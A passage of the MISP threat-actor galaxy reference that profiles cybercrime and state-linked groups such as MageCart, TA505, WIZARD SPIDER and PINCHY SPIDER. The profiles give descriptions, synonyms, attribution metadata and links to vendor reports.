This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activist. The threat actor also targeted the Myanmar electoral commission.
Internal MISP references
UUID bea5e256-bcc0-11e8-a478-bbf7e7585a1e
which can be used as unique global reference for Unnamed Actor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['China', 'Myanmar', 'Hong Kong', 'Taiwan'] |
cfr-target-category | ['Civil society', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
MageCart
Digital threat management company RiskIQ tracks the activity of MageCart group and reported their use of web-based card skimmers since 2016.
Internal MISP references
UUID 0768fd50-c547-11e8-9aa5-776183769eab
which can be used as unique global reference for MageCart
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/british-airways-fell-victim-to-card-scraping-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/feedify-hacked-with-magecart-information-stealing-script/ - webarchive
- https://www.bleepingcomputer.com/news/security/magecart-group-compromises-plugin-used-in-thousands-of-stores-makes-rookie-mistake/ - webarchive
- https://www.bleepingcomputer.com/news/security/visiondirect-data-breach-caused-by-magecart-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/magecart-group-sabotages-rival-to-ruin-data-and-reputation/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Domestic Kitten
An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Domestic Kitten.
Known Synonyms |
---|
APT-C-50 |
Bouncing Golf |
Internal MISP references
UUID dda1b28e-c558-11e8-8666-27cf61d1d7ee
which can be used as unique global reference for Domestic Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/ - webarchive
- https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html - webarchive
- https://www.welivesecurity.com/2022/10/20/domestic-kitten-campaign-spying-iranian-citizens-furball-malware/ - webarchive
- https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
FASTCash
Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.
Internal MISP references
UUID e38d32a2-c708-11e8-8785-472c4cfccd85
which can be used as unique global reference for FASTCash
in MISP communities and other software using the MISP galaxy
Roaming Mantis
According to new research by Kaspersky's GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user's traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Roaming Mantis.
Known Synonyms |
---|
Roaming Mantis Group |
Internal MISP references
UUID b27beb94-ce25-11e8-8e11-2f1a59bd0e91
which can be used as unique global reference for Roaming Mantis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
threat-actor-classification | ['campaign'] |
GreyEnergy
ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks
Internal MISP references
UUID d52ca4c4-d214-11e8-8d29-c3e7cb78acce
which can be used as unique global reference for GreyEnergy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
The Shadow Brokers
The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA, including several zero-day exploits.[1] Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA's Tailored Access Operations unit.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular The Shadow Brokers.
Known Synonyms |
---|
Shadow Brokers |
ShadowBrokers |
TSB |
The ShadowBrokers |
Internal MISP references
UUID d5e90854-d5c9-11e8-98b9-1f98eb80d30a
which can be used as unique global reference for The Shadow Brokers
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/The_Shadow_Brokers - webarchive
- https://securelist.com/darkpulsar/88199/ - webarchive
- https://musalbas.com/blog/2016/08/16/equation-group-firewall-operations-catalogue.html - webarchive
- https://www.vice.com/en_us/article/53djj3/shadow-brokers-whine-that-nobody-is-buying-their-hacked-nsa-files - webarchive
- https://www.scmagazineuk.com/second-shadow-brokers-dump-released/article/1476023 - webarchive
- https://www.cyberscoop.com/nsa-shadow-brokers-leaks-iran-russia-optimusprime-stoicsurgeon/ - webarchive
- https://www.csoonline.com/article/3190055/new-nsa-leak-may-expose-its-bank-spying-windows-exploits.html - webarchive
- https://threatpost.com/shadowbrokers-dump-more-equation-group-hacks-auction-file-password/124882/ - webarchive
- http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html - webarchive
- https://www.hackread.com/nsa-data-dump-shadowbrokers-expose-unitedrake-malware/ - webarchive
- https://blacklakesecurity.com/who-was-the-nsa-contractor-arrested-for-leaking-the-shadow-brokers-hacking-tools/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
EvilTraffic
Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilTraffic.
Known Synonyms |
---|
Operation EvilTraffic |
Internal MISP references
UUID c2d5a052-dc30-11e8-9643-d76f3b9c94fa
which can be used as unique global reference for EvilTraffic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HookAds
HookAds is a malvertising campaign that purchases cheap ad space on low quality ad networks commonly used by adult web sites, online games, or blackhat seo sites. These ads will include JavaScript that redirects a visitor through a serious of decoy sites that look like pages filled with native advertisements, online games, or other low quality pages. Under the right circumstances, a visitor will silently load the Fallout exploit kit, which will try and install its malware payload.
Internal MISP references
UUID dce617eb-a3b6-4a9a-bd76-575c424f9761
which can be used as unique global reference for HookAds
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
INDRIK SPIDER
INDRIK SPIDER is a sophisticated eCrime group that has been operating Dridex since June 2014. In 2015 and 2016, Dridex was one of the most prolific eCrime banking trojans on the market and, since 2014, those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits. Throughout its years of operation, Dridex has received multiple updates with new modules developed and new anti-analysis features added to the malware. In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.
Internal MISP references
UUID 658314bc-3bb8-48d2-913a-c528607b75c8
which can be used as unique global reference for INDRIK SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Related clusters
To see the related clusters, click here.
DNSpionage
Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks. Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful. In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSpionage.
Known Synonyms |
---|
COBALT EDGEWATER |
Internal MISP references
UUID 608a903a-8145-4fd1-84bc-235e278480bf
which can be used as unique global reference for DNSpionage
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html - webarchive
- https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html - webarchive
- https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/ - webarchive
- https://krebsonsecurity.com/tag/dnspionage/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-edgewater - webarchive
Associated metadata
Metadata key | Value |
---|---|
DarkVishnya
Dubbed DarkVishnya, the attacks targeted at least eight banks using readily-available gear such as netbooks or inexpensive laptops, Raspberry Pi mini-computers, or a Bash Bunny - a USB-sized piece hardware for penetration testing purposes that can pose as a keyboard, flash storage, network adapter, or as any serial device.
Internal MISP references
UUID db7fd7dd-28f7-4e8d-a807-8405e4b0f4e2
which can be used as unique global reference for DarkVishnya
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Poison Needles
What’s noteworthy is that according to the introduction on the compromised website of the polyclinic (http://www.p2f.ru), the institution was established in 1965 and it was founded by the Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative, judicial authorities of the Russian Federation, as well as famous figures of science and art. Since it is the first detection of this APT attack by 360 Security on a global scale, we code-named it as “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitiveness of the group it served both indicate the attack is highly targeted. Simultaneously, the attack occurred at a very sensitive timing of the Kerch Strait Incident, so it also aroused the assumption on the political attribution of the attack.
Internal MISP references
UUID 08ff3cb6-c292-4360-a978-6f05775881ed
which can be used as unique global reference for Operation Poison Needles
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GC01
From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GC01.
Known Synonyms |
---|
Golden Chickens |
Golden Chickens 01 |
Golden Chickens01 |
Internal MISP references
UUID 6bd7c91a-fdf5-11e8-95a8-e712ad4b0a9d
which can be used as unique global reference for GC01
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
GC02
From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GC02.
Known Synonyms |
---|
Golden Chickens |
Golden Chickens 02 |
Golden Chickens02 |
Internal MISP references
UUID 6d50a8a2-fdf5-11e8-9db3-833f231caac8
which can be used as unique global reference for GC02
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Operation Sharpshooter
The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.
Internal MISP references
UUID b06c3af1-0243-4428-88da-b3451c345e1e
which can be used as unique global reference for Operation Sharpshooter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
TA505
TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA505.
Known Synonyms |
---|
ATK103 |
CHIMBORAZO |
Dudear |
G0092 |
GOLD TAHOE |
GRACEFUL SPIDER |
Hive0065 |
SectorJ04 |
SectorJ04 Group |
Spandex Tempest |
Internal MISP references
UUID 03c80674-35f8-4fe0-be2b-226ed0fcd69f
which can be used as unique global reference for TA505
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/ - webarchive
- https://www.proofpoint.com/sites/default/files/ta505_timeline_final4_0.png - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter - webarchive
- https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware - webarchive
- https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf - webarchive
- https://threatpost.com/ta505-servhelper-malware/140792/ - webarchive
- https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/ - webarchive
- https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104 - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546 - webarchive
- https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/ - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- https://cyberthreat.thalesgroup.com/attackers/ATK103 - webarchive
- https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ - webarchive
- https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia', 'Canada', 'Czech Republic', 'Germany', 'Hungary', 'India', 'Japan', 'Romania', 'Serbia', 'Singapore', 'South Korea', 'Spain', 'Thailand', 'Turkey', 'United Kingdom', 'United States'] |
cfr-target-category | ['Education', 'Finance', 'Health', 'Retail', 'Hospitality'] |
country | RU |
Related clusters
To see the related clusters, click here.
GRIM SPIDER
GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GRIM SPIDER.
Known Synonyms |
---|
GOLD ULRICK |
Internal MISP references
UUID 3cf6dbb5-bf9e-47d4-a8d5-b6d76f5a791f
which can be used as unique global reference for GRIM SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WIZARD SPIDER
Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WIZARD SPIDER.
Known Synonyms |
---|
DEV-0193 |
DEV-0237 |
FIN12 |
GOLD BLACKBURN |
Periwinkle Tempest |
Pistachio Tempest |
Storm-0193 |
TEMP.MixMaster |
Trickbot LLC |
UNC2053 |
Internal MISP references
UUID bdf4fe4f-af8a-495f-a719-cf175cecda1f
which can be used as unique global reference for WIZARD SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/ - webarchive
- https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-ulrick - webarchive
- https://www.secureworks.com/research/dyre-banking-trojan - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf - webarchive
- https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Australia', 'Bahamas', 'Canada', 'Costa Rica', 'France', 'Germany', 'India', 'Ireland', 'Italy', 'Japan', 'Mexico', 'New Zealand', 'Spain', 'Switzerland', 'Taiwan', 'United Kingdom', 'Ukraine', 'United States'] |
cfr-target-category | ['Defense', 'Financial', 'Government', 'Healthcare', 'Telecommunications'] |
country | RU |
Related clusters
To see the related clusters, click here.
MUMMY SPIDER
MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10 month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects, it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients and a spam plugin for self-propagation. The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MUMMY SPIDER.
Known Synonyms |
---|
GOLD CRESTWOOD |
TA542 |
Internal MISP references
UUID c93281be-f6cd-4cd0-a5a3-defde9d77d8b
which can be used as unique global reference for MUMMY SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-crestwood - webarchive
Associated metadata
Metadata key | Value |
---|---|
STARDUST CHOLLIMA
Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been public reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.
Internal MISP references
UUID d8e1762a-0063-48c2-9ea1-8d176d14b70f
which can be used as unique global reference for STARDUST CHOLLIMA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cold River
In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cold River.
Known Synonyms |
---|
Nahr Elbard |
Nahr el bared |
Internal MISP references
UUID 7d99d2f7-adf0-44e4-9044-d18ff6842a16
which can be used as unique global reference for Cold River
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Silence group
a relatively new threat actor that’s been operating since mid-2016 Group-IB has exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group's activity in more than 25 countries worldwide. Group-IB has published its first detailed report on tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silence group.
Known Synonyms |
---|
Silence |
WHISPER SPIDER |
Internal MISP references
UUID 0d5e17fd-7a71-47fd-b4bc-867cdb833726
which can be used as unique global reference for Silence group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
spoken-language | ['rus'] |
APT39
APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39's targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT39.
Known Synonyms |
---|
COBALT HICKMAN |
Chafer |
G0087 |
REMIX KITTEN |
Radio Serpens |
TA454 |
Internal MISP references
UUID c2c64bd3-a325-446f-91a8-b4c0f173a30b
which can be used as unique global reference for APT39
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html - webarchive
- https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - webarchive
- https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/ - webarchive
- https://securelist.com/chafer-used-remexi-malware/89538/ - webarchive
- https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets - webarchive
- https://attack.mitre.org/groups/G0087/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-hickman - webarchive
- https://unit42.paloaltonetworks.com/atoms/radioserpens/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Siesta
FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.
Internal MISP references
UUID 27c97181-b8e9-43e1-93c0-f953cac45326
which can be used as unique global reference for Siesta
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gallmaker
Symantec researchers have uncovered a previously unknown attack group that is targeting government and military targets, including several overseas embassies of an Eastern European country, and military and defense targets in the Middle East. This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign. The group, which we have given the name Gallmaker, has been operating since at least December 2017, with its most recent activity observed in June 2018.
Internal MISP references
UUID c79dab01-3f9f-491e-8a5f-6423339c9f76
which can be used as unique global reference for Gallmaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BOSS SPIDER
Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BOSS SPIDER.
Known Synonyms |
---|
GOLD LOWELL |
Internal MISP references
UUID d6a13387-4c98-4a0c-a516-6c36c081b64c
which can be used as unique global reference for BOSS SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-lowell - webarchive
- https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit - webarchive
- https://www.secureworks.com/blog/samas-ransomware - webarchive
- https://www.secureworks.com/blog/ransomware-deployed-by-adversary - webarchive
- https://www.secureworks.com/research/samsam-ransomware-campaigns - webarchive
Associated metadata
Metadata key | Value |
---|---|
PINCHY SPIDER
First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.
Internal MISP references
